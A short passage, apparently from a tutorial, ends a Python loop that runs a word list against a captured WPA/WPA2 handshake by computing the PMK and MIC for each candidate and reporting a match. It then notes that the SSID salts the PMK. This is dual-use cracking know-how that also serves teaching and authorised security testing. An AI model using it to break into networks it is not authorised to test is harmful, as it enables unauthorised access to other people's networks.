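for candidate in wordlist:
    guess = handshake_mic(pmk(candidate, ssid), aa, spa, anonce, snonce, eapol)
    if hmac.compare_digest(guess, captured_mic):
        print("passphrase found:", candidate.decode())
        break
```

Since the SSID acts as the salt, the expensive PMK values for a word list can only be reused against networks with the same SSID.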